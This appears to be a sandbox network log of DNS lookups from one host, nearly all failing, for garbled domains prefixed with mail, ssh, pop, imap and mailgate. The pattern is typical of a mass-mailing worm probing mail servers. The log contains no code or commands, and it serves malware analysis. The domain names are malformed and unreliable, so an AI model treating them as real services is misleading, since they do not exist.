Nov 30, 2023 11:22:40.866420031 CET	1.1.1.1	192.168.2.4	0xcc85	Name error (3)	ftp.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.874929905 CET	1.1.1.1	192.168.2.4	0x42d4	Name error (3)	ssh.qebyte.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.875874043 CET	1.1.1.1	192.168.2.4	0x1df4	Name error (3)	ssh.yahao.lsa	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.879686117 CET	1.1.1.1	192.168.2.4	0x755a	Name error (3)	ssh.deptka7ffmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.880474091 CET	1.1.1.1	192.168.2.4	0x66df	Name error (3)	ssh.ez786-lcolwicn.coofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.881040096 CET	1.1.1.1	192.168.2.4	0x43cf	Name error (3)	ssh.wn26lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.909909010 CET	1.1.1.1	192.168.2.4	0xeede	Name error (3)	ssh.gmai76afmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.946499109 CET	1.1.1.1	192.168.2.4	0xe366	Name error (3)	pop3.hotmea1aia.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.979635000 CET	1.1.1.1	192.168.2.4	0x2930	Name error (3)	ssh.wr.omt222lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.995243073 CET	1.1.1.1	192.168.2.4	0xc75c	Name error (3)	mail.a.o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.010907888 CET	1.1.1.1	192.168.2.4	0xd511	Name error (3)	ftp.1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.010934114 CET	1.1.1.1	192.168.2.4	0xd511	Name error (3)	ftp.1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.022409916 CET	1.1.1.1	192.168.2.4	0x14a9	Name error (3)	ssh.asgmaanxgdil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.051523924 CET	1.1.1.1	192.168.2.4	0x2e31	Name error (3)	mail.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.105782986 CET	1.1.1.1	192.168.2.4	0x5f80	Name error (3)	mailgate.yahgt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.114990950 CET	1.1.1.1	192.168.2.4	0x2e31	Name error (3)	mail.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.144392014 CET	1.1.1.1	192.168.2.4	0x4227	Name error (3)	ssh.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.191104889 CET	1.1.1.1	192.168.2.4	0xa0fc	Name error (3)	mail.1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.191124916 CET	1.1.1.1	192.168.2.4	0xa0fc	Name error (3)	mail.1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.193135977 CET	1.1.1.1	192.168.2.4	0xfde5	Name error (3)	mail.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.193154097 CET	1.1.1.1	192.168.2.4	0xfde5	Name error (3)	mail.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.289061069 CET	1.1.1.1	192.168.2.4	0xe802	Name error (3)	yahao.lsa	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.291196108 CET	1.1.1.1	192.168.2.4	0x905c	Name error (3)	imap.ytcjmiil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.293028116 CET	1.1.1.1	192.168.2.4	0xa5e8	Name error (3)	fldie12.jdgwcollfaaba.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.293153048 CET	1.1.1.1	192.168.2.4	0x4b63	Name error (3)	ssh.osrniamadvea.lrhzda.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.294087887 CET	1.1.1.1	192.168.2.4	0x8edd	Name error (3)	comcamm.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.294667959 CET	1.1.1.1	192.168.2.4	0x8932	Name error (3)	aomttdl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.294934034 CET	1.1.1.1	192.168.2.4	0xaddd	Name error (3)	mn.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.296026945 CET	1.1.1.1	192.168.2.4	0x562d	Name error (3)	yah23051987hont.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.296392918 CET	1.1.1.1	192.168.2.4	0xe777	Name error (3)	mail.yahio.comcm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.296549082 CET	1.1.1.1	192.168.2.4	0x2637	Name error (3)	ssh.oa.lagdfillemlmlml00xydurail.jkeziac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.298068047 CET	1.1.1.1	192.168.2.4	0x4820	Name error (3)	e-fja8mso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.298270941 CET	1.1.1.1	192.168.2.4	0x4cf3	Name error (3)	ezi.adompany.at	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.301171064 CET	1.1.1.1	192.168.2.4	0x67ba	Name error (3)	geu015naryo-uail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.301469088 CET	1.1.1.1	192.168.2.4	0x3a52	Name error (3)	ez786-lcolwicn.coofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.303060055 CET	1.1.1.1	192.168.2.4	0x9acf	Name error (3)	hgaarnlundejl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.305349112 CET	1.1.1.1	192.168.2.4	0x7790	Name error (3)	yahwoooie2ampu.comsh	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.305553913 CET	1.1.1.1	192.168.2.4	0xd6ed	Name error (3)	n.n.amdiu	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.307775974 CET	1.1.1.1	192.168.2.4	0xa2c9	Name error (3)	ssh.jubo.cath	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.309278965 CET	1.1.1.1	192.168.2.4	0x43ed	Name error (3)	a.o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.311381102 CET	1.1.1.1	192.168.2.4	0xfd3d	Name error (3)	mail.gmai76afmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.312061071 CET	1.1.1.1	192.168.2.4	0xd416	Name error (3)	mail.t.ahlfth	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.312315941 CET	1.1.1.1	192.168.2.4	0xcc8c	Name error (3)	h2.spainvil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.345598936 CET	1.1.1.1	192.168.2.4	0x55ad	Name error (3)	horadguc1995l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.348998070 CET	1.1.1.1	192.168.2.4	0x2d11	Name error (3)	gmaiuilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.359512091 CET	1.1.1.1	192.168.2.4	0xde60	Name error (3)	klp.tn	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.360322952 CET	1.1.1.1	192.168.2.4	0x93e2	Name error (3)	ho10a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.380045891 CET	1.1.1.1	192.168.2.4	0xe1a9	Name error (3)	t.ahlfth	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.382505894 CET	1.1.1.1	192.168.2.4	0xc5d0	Name error (3)	yahe.nen	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.386617899 CET	1.1.1.1	192.168.2.4	0x8025	Name error (3)	yahpn.yb	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.387473106 CET	1.1.1.1	192.168.2.4	0xc75c	Name error (3)	cucumbnr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.392776012 CET	1.1.1.1	192.168.2.4	0x649e	Name error (3)	il.om	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.398753881 CET	1.1.1.1	192.168.2.4	0xe824	Name error (3)	ayls.xcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.399187088 CET	1.1.1.1	192.168.2.4	0x5f41	Name error (3)	syn.lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.399947882 CET	1.1.1.1	192.168.2.4	0x911b	Name error (3)	imap.hot13l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.400711060 CET	1.1.1.1	192.168.2.4	0x26a5	Name error (3)	as.r.upze	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.401119947 CET	1.1.1.1	192.168.2.4	0xacf	Name error (3)	gez542l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.401278973 CET	1.1.1.1	192.168.2.4	0x5890	Name error (3)	ssh.gmaiuilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.403812885 CET	1.1.1.1	192.168.2.4	0x863d	Name error (3)	ssh.gez542l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.403959036 CET	1.1.1.1	192.168.2.4	0x546b	Name error (3)	ee.idbo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.405005932 CET	1.1.1.1	192.168.2.4	0x6263	Name error (3)	ssh.aomttdl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.407303095 CET	1.1.1.1	192.168.2.4	0x1aa4	Name error (3)	pop3.ee.idbo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.409616947 CET	1.1.1.1	192.168.2.4	0x71a8	Name error (3)	nnblmogblmoglil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.413021088 CET	1.1.1.1	192.168.2.4	0xc7ab	Name error (3)	deptka7ffmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.415324926 CET	1.1.1.1	192.168.2.4	0x93b5	Name error (3)	ser711a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.416306019 CET	1.1.1.1	192.168.2.4	0x98a3	Name error (3)	ssh.s.ddo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.416846037 CET	1.1.1.1	192.168.2.4	0xeecd	Name error (3)	yahnt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.417068958 CET	1.1.1.1	192.168.2.4	0xbe09	Name error (3)	ssh.h2.spainvil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.423341990 CET	1.1.1.1	192.168.2.4	0xc79a	Name error (3)	ssh.e-fja8mso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.424995899 CET	1.1.1.1	192.168.2.4	0x219b	Name error (3)	sbcgloboo.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.430470943 CET	1.1.1.1	192.168.2.4	0xe25d	Name error (3)	rambojoocta.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.433691025 CET	1.1.1.1	192.168.2.4	0x19c9	Name error (3)	s.ddo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.443247080 CET	1.1.1.1	192.168.2.4	0x595f	Name error (3)	pop.rhacmtu.au	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.443644047 CET	1.1.1.1	192.168.2.4	0xa76d	Name error (3)	pop.h333ol03t8rwslive21lok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.444344997 CET	1.1.1.1	192.168.2.4	0xb995	Name error (3)	pop.sbcgloboo.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.449131012 CET	1.1.1.1	192.168.2.4	0x9862	Name error (3)	acesineuiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.455400944 CET	1.1.1.1	192.168.2.4	0xd095	Name error (3)	ssh.7.dceilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.455409050 CET	1.1.1.1	192.168.2.4	0x9c51	Name error (3)	h333ol03t8rwslive21lok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.459633112 CET	1.1.1.1	192.168.2.4	0x42a6	Name error (3)	gmdcblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.462557077 CET	1.1.1.1	192.168.2.4	0x39a7	Name error (3)	he0114zusmg454lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.463347912 CET	1.1.1.1	192.168.2.4	0x7881	Name error (3)	pop.as.r.upze	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.482172012 CET	1.1.1.1	192.168.2.4	0xf2d4	Name error (3)	ssh.rambojoocta.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.484790087 CET	1.1.1.1	192.168.2.4	0x14c6	Name error (3)	asail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.494398117 CET	1.1.1.1	192.168.2.4	0x1dad	Name error (3)	gbivlporollm.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.501684904 CET	1.1.1.1	192.168.2.4	0xfd7b	Name error (3)	m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.513375998 CET	1.1.1.1	192.168.2.4	0xf0d2	Server failure (2)	rknsieiwn.ail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.525491953 CET	1.1.1.1	192.168.2.4	0xcd79	Name error (3)	feoio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.533334970 CET	1.1.1.1	192.168.2.4	0xd6e9	Name error (3)	ssh.h333ol03t8rwslive21lok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.552882910 CET	1.1.1.1	192.168.2.4	0x4370	Name error (3)	mailgate.gbivlporollm.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.572873116 CET	1.1.1.1	192.168.2.4	0x188e	Name error (3)	ssh.yahgr.neaco	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.574130058 CET	1.1.1.1	192.168.2.4	0x3298	Name error (3)	gmai76afmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.576469898 CET	1.1.1.1	192.168.2.4	0x52d8	Name error (3)	7.dceilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.597601891 CET	1.1.1.1	192.168.2.4	0xf8b	Name error (3)	as.hauet	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.597775936 CET	1.1.1.1	192.168.2.4	0xf243	Name error (3)	ssh.yahjl.cxs	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.599180937 CET	1.1.1.1	192.168.2.4	0xa1e8	Name error (3)	ssh.gtblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.599337101 CET	1.1.1.1	192.168.2.4	0xdf87	Name error (3)	wn26lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.601386070 CET	1.1.1.1	192.168.2.4	0x17ad	Name error (3)	ssh.lyco2.comom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.601850986 CET	1.1.1.1	192.168.2.4	0x36f7	Name error (3)	ssh.yahgt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.602034092 CET	1.1.1.1	192.168.2.4	0xb88f	Name error (3)	ssh.kni.ol168.ecom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.602571011 CET	1.1.1.1	192.168.2.4	0x792e	Name error (3)	yahfll.ianus	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.602921009 CET	1.1.1.1	192.168.2.4	0xc43	Name error (3)	pop.fldie12.jdgwcollfaaba.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.602957010 CET	1.1.1.1	192.168.2.4	0x3d5a	Name error (3)	slyvor.as290a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.603327036 CET	1.1.1.1	192.168.2.4	0x4632	Name error (3)	imap.horadguc1995l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.604454994 CET	1.1.1.1	192.168.2.4	0x1f7	Name error (3)	hotmea1aia.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.604482889 CET	1.1.1.1	192.168.2.4	0x7b19	Name error (3)	ssh.ee.idbo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.604499102 CET	1.1.1.1	192.168.2.4	0x7667	Name error (3)	mail.getococuail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.604823112 CET	1.1.1.1	192.168.2.4	0xcacf	Name error (3)	f.nyhm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.605017900 CET	1.1.1.1	192.168.2.4	0x4904	Name error (3)	yahio.comcm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.605390072 CET	1.1.1.1	192.168.2.4	0xfbff	Name error (3)	ssh.il.om	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.605935097 CET	1.1.1.1	192.168.2.4	0x8d74	Name error (3)	ssh.f.nyhm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.606045008 CET	1.1.1.1	192.168.2.4	0x5c16	Name error (3)	qebyte.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.606287956 CET	1.1.1.1	192.168.2.4	0x2e61	Name error (3)	ssh.horadguc1995l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.607296944 CET	1.1.1.1	192.168.2.4	0x4c41	Name error (3)	ssh.ytcjmiil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.607892990 CET	1.1.1.1	192.168.2.4	0xf2cf	Name error (3)	ssh.slyvor.as290a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.607911110 CET	1.1.1.1	192.168.2.4	0x2515	Name error (3)	jubo.cath	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.607925892 CET	1.1.1.1	192.168.2.4	0xfa03	Name error (3)	lyco2.comom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.608076096 CET	1.1.1.1	192.168.2.4	0x99b	Name error (3)	pyctl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.608963013 CET	1.1.1.1	192.168.2.4	0x1df4	Name error (3)	mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.608979940 CET	1.1.1.1	192.168.2.4	0x1df4	Name error (3)	mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.610153913 CET	1.1.1.1	192.168.2.4	0x6ca5	Name error (3)	ssh.ho10a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.611435890 CET	1.1.1.1	192.168.2.4	0x9fd	Name error (3)	pop.yahgr.neaco	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.612196922 CET	1.1.1.1	192.168.2.4	0xaf49	Name error (3)	rhacmtu.au	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.613497019 CET	1.1.1.1	192.168.2.4	0x282	Name error (3)	pop.t-yil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.613539934 CET	1.1.1.1	192.168.2.4	0x1bd5	Name error (3)	caatholiomissa.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.617470026 CET	1.1.1.1	192.168.2.4	0xc19a	Name error (3)	buromaril.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.620214939 CET	1.1.1.1	192.168.2.4	0xaf8	Name error (3)	pop.comcaci.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.620877981 CET	1.1.1.1	192.168.2.4	0xbba6	Name error (3)	mail.hotmea1aia.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.624320984 CET	1.1.1.1	192.168.2.4	0xc087	Name error (3)	yahjl.cxs	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.625703096 CET	1.1.1.1	192.168.2.4	0x9d7d	Name error (3)	yahgr.neaco	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.651000023 CET	1.1.1.1	192.168.2.4	0x821a	Name error (3)	ssh.yahpl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.681123018 CET	1.1.1.1	192.168.2.4	0x6ff0	Name error (3)	ssh.klp.tn	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.683027029 CET	1.1.1.1	192.168.2.4	0x1f07	Name error (3)	loaquorezcil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.685884953 CET	1.1.1.1	192.168.2.4	0x575b	Name error (3)	ssh.sbcgloboo.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.701303959 CET	1.1.1.1	192.168.2.4	0x9d1c	Name error (3)	ssh.rhacmtu.au	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.705780983 CET	1.1.1.1	192.168.2.4	0x44da	Name error (3)	ssh.1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.733094931 CET	1.1.1.1	192.168.2.4	0xdf87	Name error (3)	wn26lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.737910032 CET	1.1.1.1	192.168.2.4	0x2d71	Name error (3)	ytcjmiil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.738995075 CET	1.1.1.1	192.168.2.4	0x637f	Name error (3)	1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.739063978 CET	1.1.1.1	192.168.2.4	0x637f	Name error (3)	1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.743848085 CET	1.1.1.1	192.168.2.4	0xc204	Name error (3)	pop.hot13l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.795711994 CET	1.1.1.1	192.168.2.4	0x239d	Name error (3)	oa.lagdfillemlmlml00xydurail.jkeziac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.798392057 CET	1.1.1.1	192.168.2.4	0x34b9	Name error (3)	mail.gtblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.799597025 CET	1.1.1.1	192.168.2.4	0xfeca	Name error (3)	ochcar.cin4g9tdamn.bagcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.805895090 CET	1.1.1.1	192.168.2.4	0xe735	Name error (3)	ssh.feoio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.807862043 CET	1.1.1.1	192.168.2.4	0x3aff	Name error (3)	mailgate.wr.omt222lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.814188957 CET	1.1.1.1	192.168.2.4	0x92b3	Name error (3)	pop3.yahjl.cxs	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.817322016 CET	1.1.1.1	192.168.2.4	0x7d7c	Name error (3)	relay.mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.823241949 CET	1.1.1.1	192.168.2.4	0x3723	Name error (3)	imap.ee.idbo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.824259043 CET	1.1.1.1	192.168.2.4	0x13e1	Name error (3)	ssh.hgaarnlundejl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.830224037 CET	1.1.1.1	192.168.2.4	0xc097	Name error (3)	imap.as.r.upze	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.835927010 CET	1.1.1.1	192.168.2.4	0xa04a	Name error (3)	imap.yahgt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.845819950 CET	1.1.1.1	192.168.2.4	0x63c2	Name error (3)	mail.yahnt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.863199949 CET	1.1.1.1	192.168.2.4	0xd000	Name error (3)	acooil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.863831043 CET	1.1.1.1	192.168.2.4	0xda0e	Name error (3)	ssh.phcg87k6barre352odseba.dcivenail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.866072893 CET	1.1.1.1	192.168.2.4	0x3a57	Name error (3)	e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.873374939 CET	1.1.1.1	192.168.2.4	0xb2b9	Name error (3)	yahgt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.897663116 CET	1.1.1.1	192.168.2.4	0x19f8	Name error (3)	imap.gmaigcmar19l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.900618076 CET	1.1.1.1	192.168.2.4	0xf7fd	Name error (3)	pop.horadguc1995l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.914594889 CET	1.1.1.1	192.168.2.4	0x732e	Name error (3)	ssh.mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.950074911 CET	1.1.1.1	192.168.2.4	0x991	Name error (3)	ssh.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.967763901 CET	1.1.1.1	192.168.2.4	0xc2be	Name error (3)	ssh.as.r.upze	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.970870018 CET	1.1.1.1	192.168.2.4	0xb905	Name error (3)	pop.f.nyhm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.971882105 CET	1.1.1.1	192.168.2.4	0x8987	Name error (3)	ssh.cucumbnr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.979146957 CET	1.1.1.1	192.168.2.4	0xc0a5	Name error (3)	pop.osrniamadvea.lrhzda.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.989331007 CET	1.1.1.1	192.168.2.4	0xe6d8	Name error (3)	pop.23xd5a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.998852968 CET	1.1.1.1	192.168.2.4	0xbc50	Name error (3)	imap.zma51baya.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.001065016 CET	1.1.1.1	192.168.2.4	0x69cc	Server failure (2)	h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.045208931 CET	1.1.1.1	192.168.2.4	0x24db	Name error (3)	mail.mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.052289009 CET	1.1.1.1	192.168.2.4	0x76f8	Name error (3)	pop.gmdcblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.052634954 CET	1.1.1.1	192.168.2.4	0x24db	Name error (3)	mail.mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.052977085 CET	1.1.1.1	192.168.2.4	0x69cc	Server failure (2)	h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.052993059 CET	1.1.1.1	192.168.2.4	0x991	Name error (3)	ssh.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.064023972 CET	1.1.1.1	192.168.2.4	0x49ef	Name error (3)	pop3.gbivlporollm.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.122420073 CET	1.1.1.1	192.168.2.4	0x76f8	Name error (3)	pop.gmdcblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.126367092 CET	1.1.1.1	192.168.2.4	0xc72d	Name error (3)	pop.gmaigcmar19l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.142421007 CET	1.1.1.1	192.168.2.4	0x7fcc	Name error (3)	pop.as.hauet	none	none	A (IP address)	IN (0x0001)	false
